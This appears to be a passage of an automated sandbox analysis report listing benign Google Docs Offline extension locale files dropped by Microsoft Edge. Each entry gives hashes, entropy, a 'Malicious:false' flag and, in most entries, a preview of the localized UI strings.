                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                  Malicious:false
